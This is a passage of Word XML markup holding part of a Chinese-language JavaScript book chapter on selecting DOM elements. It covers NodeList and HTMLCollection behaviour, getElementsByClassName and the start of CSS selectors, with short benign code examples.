      <w:r>
        <w:t>document.shipping_address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:t>document.forms</w:t>
      </w:r>
      <w:r>
        <w:t>属性也可以更具体地引用命名（或有</w:t>
      </w:r>
      <w:r>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:t>的）表单，如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.forms</w:t>
      </w:r>
      <w:r>
        <w:t>.shipping_address;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTMLDocument</w:t>
      </w:r>
      <w:r>
        <w:t>也定义</w:t>
      </w:r>
      <w:r>
        <w:t>embeds</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>plugins</w:t>
      </w:r>
      <w:r>
        <w:t>属性，它们是同义词，都是</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLCollection</w:t>
      </w:r>
      <w:r>
        <w:t>类型的＜</w:t>
      </w:r>
      <w:r>
        <w:t>embed</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的集合。</w:t>
      </w:r>
      <w:r>
        <w:t>anchors</w:t>
      </w:r>
      <w:r>
        <w:t>是非标准属性，它指代有一个</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>属性的＜</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素而并不是一个</w:t>
      </w:r>
      <w:r>
        <w:t>href</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
      <w:r>
        <w:t>scripts</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>中是标准属性，它是</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLCollection</w:t>
      </w:r>
      <w:r>
        <w:t>类型的＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的集合，但是在写本书的时候，它还未普遍实现。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>HTMLDocument</w:t>
      </w:r>
      <w:r>
        <w:t>对象还定义两个属性，它们指代特殊的单个元素而不是元素的集合。</w:t>
      </w:r>
      <w:r>
        <w:t>docume</w:t>
      </w:r>
      <w:r>
        <w:t>nt.body</w:t>
      </w:r>
      <w:r>
        <w:t>是一个</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档的＜</w:t>
      </w:r>
      <w:r>
        <w:t>body</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，</w:t>
      </w:r>
      <w:r>
        <w:t>document.head</w:t>
      </w:r>
      <w:r>
        <w:t>是＜</w:t>
      </w:r>
      <w:r>
        <w:t>head</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素。这些属性总是会定义：如果文档源代码未显式地包含＜</w:t>
      </w:r>
      <w:r>
        <w:t>head</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>body</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，浏览器将隐式地创建它们。</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>类的</w:t>
      </w:r>
      <w:r>
        <w:t>documentElement</w:t>
      </w:r>
      <w:r>
        <w:t>属性指代文档的根元素。在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档中，它总是指代＜</w:t>
      </w:r>
      <w:r>
        <w:t>html</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para07"/>
      </w:pPr>
      <w:r>
        <w:t>节点列表和</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>集合</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>getElementsByName()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>getElementsByTagName()</w:t>
      </w:r>
      <w:r>
        <w:t>都返回</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>对象，而类似</w:t>
      </w:r>
      <w:r>
        <w:t>document.images</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>document.forms</w:t>
      </w:r>
      <w:r>
        <w:t>的属性为</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLCollection</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这些对象都是只读的类数组对象（见</w:t>
      </w:r>
      <w:r>
        <w:t>7.11</w:t>
      </w:r>
      <w:r>
        <w:t>节）。它们有</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性，也可以像真正的数组一样索引（只是读而不是写）。可以对一个</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLCollection</w:t>
      </w:r>
      <w:r>
        <w:t>的内容用如下标准的循环进行迭代：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">for(var </w:t>
      </w:r>
      <w:r>
        <w:t>i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>document.images.length;i++)//</w:t>
      </w:r>
      <w:r>
        <w:t>循环所有的图片</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.images[i].style.display="none";//……</w:t>
      </w:r>
      <w:r>
        <w:t>隐藏它们</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>不能直接在</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>集合上调用</w:t>
      </w:r>
      <w:r>
        <w:t>Array</w:t>
      </w:r>
      <w:r>
        <w:t>的方法，但可以间接地使用：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var content=Array.prototype.map.call(document.getElementsByTagName("p"),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function(e){return e.innerHTML;});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTMLCollect</w:t>
      </w:r>
      <w:r>
        <w:t>ion</w:t>
      </w:r>
      <w:r>
        <w:t>对象也有额外的命名属性，也可以通过数字和字符串来索引。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>由于历史的原因，</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLCollection</w:t>
      </w:r>
      <w:r>
        <w:t>对象也都能当做函数：以数字或字符串为参数调用它就如同使用数字或字符串索引它们一般。不鼓励使用这种怪异的方式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLCollection</w:t>
      </w:r>
      <w:r>
        <w:t>接口都不是为像</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>这样的动态语言设计的。它们都定义了</w:t>
      </w:r>
      <w:r>
        <w:t>item()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，期望输入一个整数，并返回此索引处的元素。在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中根本没有必要调用此方法，因为简单地使用数组索引就能替代。类似地，</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLColle</w:t>
      </w:r>
      <w:r>
        <w:t>ction</w:t>
      </w:r>
      <w:r>
        <w:t>定义了</w:t>
      </w:r>
      <w:r>
        <w:t>namedItem()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，它返回指定属性名的值，但在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序中可以用数组索引或常规属性来访问。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLCollection</w:t>
      </w:r>
      <w:r>
        <w:t>对象不是历史文档状态的一个静态快照，而通常是实时的，并且当文档变化时它们所包含的元素列表能随之改变，这是其中一个最重要和令人惊讶的特性。假设在一个没有＜</w:t>
      </w:r>
      <w:r>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的文档中调用</w:t>
      </w:r>
      <w:r>
        <w:t>getElementsByTagName('div')</w:t>
      </w:r>
      <w:r>
        <w:t>，此时返回值是一个</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>对象。如果再在文档中插入一个新</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>的＜</w:t>
      </w:r>
      <w:r>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，此元素</w:t>
      </w:r>
      <w:r>
        <w:t>将自动成为</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>的一个成员，并且它的</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性变成</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>通常，</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLCollection</w:t>
      </w:r>
      <w:r>
        <w:t>的实时性非常有用。但是，如果要在迭代一个</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>对象时在文档中添加或删除的元素，首先会需要对</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>对象生成一个静态的副本：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var snapshot=Array.prototype.slice.call(nodelist,0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="358" w:name="15_2_4_Tong_Guo_CSSLei_Xuan_Qu_Yuan_Su_"/>
      <w:r>
        <w:t>15.2.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　通过</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>类选取元素</w:t>
      </w:r>
      <w:bookmarkEnd w:id="358"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素的</w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:t>属性值是一个以空格隔开的列表，可以为空或包含多个标识符。它描述一种方法来定义</w:t>
      </w:r>
      <w:r>
        <w:t>多组相关的文档元素：在它们的</w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:t>属性中有相同标识符的任何元素属于该组的一部分。在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:t>是保留字，所以客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>className</w:t>
      </w:r>
      <w:r>
        <w:t>属性来保存</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:t>属性值。</w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:t>属性通常与</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>样式表一起使用，对某组内的所有元素应用相同的样式，在第</w:t>
      </w:r>
      <w:r>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:t>章中将再次看到它。尽管如此，</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>定义了</w:t>
      </w:r>
      <w:r>
        <w:t>getElementsByClassName()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，它基于其</w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:t>属性值中的标识符来选取成组的文档元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>类似</w:t>
      </w:r>
      <w:r>
        <w:t>getElementsByTagName()</w:t>
      </w:r>
      <w:r>
        <w:t>，在</w:t>
      </w:r>
      <w:r>
        <w:t>HT</w:t>
      </w:r>
      <w:r>
        <w:t>ML</w:t>
      </w:r>
      <w:r>
        <w:t>文档和</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素上都可以调用</w:t>
      </w:r>
      <w:r>
        <w:t>getElementsByClassName()</w:t>
      </w:r>
      <w:r>
        <w:t>，它的返回值是一个实时的</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>对象，包含文档或元素所有匹配的后代节点。</w:t>
      </w:r>
      <w:r>
        <w:t>getElementsByClassName()</w:t>
      </w:r>
      <w:r>
        <w:t>只需要一个字符串参数，但是该字符串可以由多个空格隔开的标识符组成。只有当元素的</w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:t>属性值包含所有指定的标识符时才匹配，但是标识符的顺序是无关紧要的。注意，</w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:t>属性和</w:t>
      </w:r>
      <w:r>
        <w:t>getElementsByClassName()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的类标识符之间都是用空格隔开的，而不是逗号。如下是使用</w:t>
      </w:r>
      <w:r>
        <w:t>getElement</w:t>
      </w:r>
      <w:r>
        <w:t>sByClassName()</w:t>
      </w:r>
      <w:r>
        <w:t>的一些例子：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>查找其</w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:t>属性值中包含</w:t>
      </w:r>
      <w:r>
        <w:t>"warning"</w:t>
      </w:r>
      <w:r>
        <w:t>的所有元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var warnings=document.getElementsByClassName("warning");//</w:t>
      </w:r>
      <w:r>
        <w:t>查找以</w:t>
      </w:r>
      <w:r>
        <w:t>"log"</w:t>
      </w:r>
      <w:r>
        <w:t>命名并且有</w:t>
      </w:r>
      <w:r>
        <w:t>"error"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"fatal"</w:t>
      </w:r>
      <w:r>
        <w:t>类的元素的所有后代</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var log=document.getElementById("log");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var fatal=log.getElementsByClassName("fatal error");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如今的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器依赖于文档开头处对＜</w:t>
      </w:r>
      <w:r>
        <w:t>!DOCTYPE</w:t>
      </w:r>
      <w:r>
        <w:t>＞声明的严格程度来选择</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>怪异模式</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>标准模式</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>方式显示</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档。怪异模式是为了向后兼容性而存在的，其中一个怪异行为就是在</w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:t>属性中和</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>样式表中的类标识符不区分大小写。</w:t>
      </w:r>
      <w:r>
        <w:t>getElementsByClassName()</w:t>
      </w:r>
      <w:r>
        <w:t>方法使用样式表的匹配算法。如果文档以怪异模式渲染，</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>该方法将执行不区分大小写的字符串比较；否则，该比较区分大小写。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在写本书这段时间内，除了</w:t>
      </w:r>
      <w:r>
        <w:t>IE 8</w:t>
      </w:r>
      <w:r>
        <w:t>及其较低的版本，</w:t>
      </w:r>
      <w:r>
        <w:t>getElementsByClassName()</w:t>
      </w:r>
      <w:r>
        <w:t>在所有当前的浏览器</w:t>
      </w:r>
      <w:r>
        <w:t>中都实现了。</w:t>
      </w:r>
      <w:r>
        <w:t>IE 8</w:t>
      </w:r>
      <w:r>
        <w:t>确实支持</w:t>
      </w:r>
      <w:r>
        <w:t>querySelectorAll()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，下一节会介绍它，而</w:t>
      </w:r>
      <w:r>
        <w:t>getElementsByClassName()</w:t>
      </w:r>
      <w:r>
        <w:t>方法是可以在其之上实现的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="359" w:name="15_2_5_Tong_Guo_CSSXuan_Ze_Qi_Xuan_Qu_Yu"/>
      <w:r>
        <w:t>15.2.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　通过</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>选择器选取元素</w:t>
      </w:r>
      <w:bookmarkEnd w:id="359"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>样式表有一种非常强大的语法，那就是选择器，它用来描述文档中的若干或多组元素。</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>选择器语法的全部细节介绍超出了本书的范围</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:t>，但是这里有一些例子来说明基本的语法。元素可以用</w:t>
      </w:r>
      <w:r>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:t>、标签名或类来描述：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>#nav//id="nav"</w:t>
      </w:r>
      <w:r>
        <w:t>的元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>div//</w:t>
      </w:r>
      <w:r>
        <w:t>所有＜</w:t>
      </w:r>
      <w:r>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>.warning//</w:t>
      </w:r>
      <w:r>
        <w:t>所有在</w:t>
      </w:r>
      <w:r>
        <w:t>cla</w:t>
      </w:r>
      <w:r>
        <w:t>ss</w:t>
      </w:r>
      <w:r>
        <w:t>属性值中包含了</w:t>
      </w:r>
      <w:r>
        <w:t>"warning"</w:t>
      </w:r>
      <w:r>
        <w:t>的元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>更一般地，元素可以基于属性值来选取：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>p[lang="fr"]//</w:t>
      </w:r>
      <w:r>
        <w:t>所有使用法语的段落，如：＜</w:t>
      </w:r>
      <w:r>
        <w:t>p lang="fr"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
